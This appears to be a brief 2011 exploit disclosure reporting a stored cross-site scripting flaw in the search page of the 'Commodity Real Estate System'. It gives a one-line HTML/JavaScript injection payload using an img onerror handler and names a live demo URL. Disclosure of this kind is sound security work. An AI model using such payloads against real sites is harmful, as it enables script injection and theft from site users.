Commodity Real Estate System suffers from a cross site scripting vulnerability.
26cc8d0dbc0d8eecb8da86f8f8a1ab67fb917d363868b1cde3f7aca9cdb1826e
# Exploit Title: Commodity Real Estate System Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
Cross Site Scripting can be done using the command input
Vulnerable Page:
searchproperty (Search Modules)
Exploit:
"/></a></><img src=1.gif onerror=alert(1)>
Demo:
https://realestate.commodityrentals.com/searchproperty
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
https://www.eyupcelik.com.tr